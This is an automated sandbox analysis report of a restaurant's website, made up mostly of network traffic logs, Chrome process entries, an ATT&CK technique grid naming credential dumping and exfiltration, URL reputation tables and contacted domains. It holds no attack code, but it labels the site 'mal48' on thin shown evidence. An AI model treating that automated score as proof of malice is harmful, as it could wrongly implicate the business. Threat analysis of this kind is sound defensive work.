Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: classification engineClassification label: mal48.win@23/394@16/8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,16327888069713662135,12520818164670430321,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.afghanhayatrestaurant.com.au/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,16327888069713662135,12520818164670430321,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.afghanhayatrestaurant.com.au/5%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://g.co/dev/maps-no-account0%URL Reputationsafe
https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled0%URL Reputationsafe
https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace0%URL Reputationsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=6877870%URL Reputationsafe
https://goo.gle/js-api-loading0%URL Reputationsafe
https://bugs.chromium.org/p/chromium/issues/detail?id=4702580%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/styling#cloud_tooling0%URL Reputationsafe
https://support.google.com/fusiontables/answer/9185417).0%URL Reputationsafe
https://developers.google.com/maps/deprecations0%URL Reputationsafe
https://jsperf.com/getall-vs-sizzle/20%URL Reputationsafe
https://jquery.com/0%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/advanced-markers/migration0%URL Reputationsafe
https://sizzlejs.com/0%URL Reputationsafe
https://bugs.jquery.com/ticket/123590%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browsers0%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/libraries0%URL Reputationsafe
https://bugs.chromium.org/p/chromium/issues/detail?id=3786070%URL Reputationsafe
http://daneden.me/animate0%URL Reputationsafe
https://drafts.csswg.org/cssom/#resolved-values0%URL Reputationsafe
https://bugs.chromium.org/p/chromium/issues/detail?id=5893470%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/error-messages#0%URL Reputationsafe
https://html.spec.whatwg.org/multipage/syntax.html#attributes-20%URL Reputationsafe
https://promisesaplus.com/#point-590%URL Reputationsafe
https://promisesaplus.com/#point-570%URL Reputationsafe
https://getbootstrap.com/)0%URL Reputationsafe
https://promisesaplus.com/#point-540%URL Reputationsafe
https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled0%URL Reputationsafe
https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/1%VirustotalBrowse
http://afghanhayatrestaurant.com.au/2%VirustotalBrowse
https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon0%VirustotalBrowse
https://github.com/twbs/bootstrap/graphs/contributors)0%VirustotalBrowse
https://html.spec.whatwg.org/#nonce-attributes0%VirustotalBrowse
https://bugs.jquery.com/ticket/48330%VirustotalBrowse
https://github.com/twbs/bootstrap/blob/master/LICENSE)0%VirustotalBrowse
https://github.com/FezVrasta/popper.js/pull/7150%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    unknown
    afghanhayatrestaurant.com.au
    162.0.209.239
    truefalse
      unknown
      www.google.com
      142.250.186.68
      truefalse
        unknown
        www10.smartname.com
        3.33.243.145
        truefalse
          unknown
          fp2e7a.wpc.phicdn.net
          192.229.221.95
          truefalse
            unknown
            cuturls.net
            162.210.196.168
            truefalse
              unknown
              www.afghanhayatrestaurant.com.au
              unknown
              unknownfalse
                unknown
                ww1.cuturls.net
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://www.afghanhayatrestaurant.com.au/assets/vendors/themify-icons/css/themify-icons.csstrue
                    unknown
                    https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Rice_with_Dhal.pngtrue
                      unknown
                      https://www.afghanhayatrestaurant.com.au/assets/imgs/header_5.jpgtrue
                        unknown
                        https://www.afghanhayatrestaurant.com.au/assets/vendors/themify-icons/fonts/themify.woff?-fvbanetrue
                          unknown
                          https://www.afghanhayatrestaurant.com.au/assets/vendors/bootstrap/bootstrap.bundle.jstrue
                            unknown
                            https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Cauliflower_Curry.pngtrue
                              unknown
                              https://www.afghanhayatrestaurant.com.au/assets/imgs/back_2.pngtrue
                                unknown
                                https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N2.jpgtrue
                                  unknown
                                  https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Afghani_Rice_Mix_Kabab.pngtrue
                                    unknown
                                    https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_extra.pngtrue
                                      unknown
                                      https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-2.jpgtrue
                                        unknown
                                        https://www.afghanhayatrestaurant.com.au/assets/imgs/featured-image-04.jpgtrue
                                          unknown
                                          https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-9.jpgtrue
                                            unknown
                                            https://www.afghanhayatrestaurant.com.au/assets/imgs/cook_dinner.pngtrue
                                              unknown
